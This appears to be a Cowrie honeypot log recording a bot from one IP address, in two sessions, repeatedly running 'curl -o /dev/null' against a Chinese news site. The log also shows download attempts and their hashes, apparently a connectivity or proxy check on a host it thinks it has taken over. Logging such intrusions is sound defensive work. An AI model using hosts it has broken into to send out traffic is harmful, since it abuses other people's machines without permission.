{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.954547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.955567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.957443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.958456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.011843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.013071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.015227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.016397Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.037066Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.075043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.076182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.078337Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.079343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.135630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.136845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.139648Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.142409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.143821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.195921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.197100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.205599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.206546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.220527Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.247196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.248410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.257362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.258440Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.292870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.294040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.302032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.303108Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.340842Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.342011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.355620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.356846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.362884Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.385896Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.401737Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.402915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.426690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.427740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.429894Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.431087Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.466455Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.467163Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.485573Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.486630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.489229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.504886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.506011Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.508510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.509360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.536908Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.537948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.578631Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.579911Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.596558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.597686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.616212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.617314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.631923Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.634633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.652513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.653580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.664713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.665639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.678781Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.680573Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.697055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.698228Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.704496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.705489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.740040Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.741175Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.743255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.744241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.746603Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.747397Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.787336Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.845268Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.846579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.849093Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.850092Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.901192Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.910395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.911463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.914292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.915416Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.930154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.956447Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.957596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:48.965686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.966637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:48.968650Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.017945Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.054871Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.062330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.063653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.072650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.073621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.092400Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.124506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.125824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.134216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.135307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.177638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.178787Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.190601Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.191535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.232017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.233153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.246422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.247222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.283634Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.292453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.293576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.304705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.305797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.338109Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.341679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.342777Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.356800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.357996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
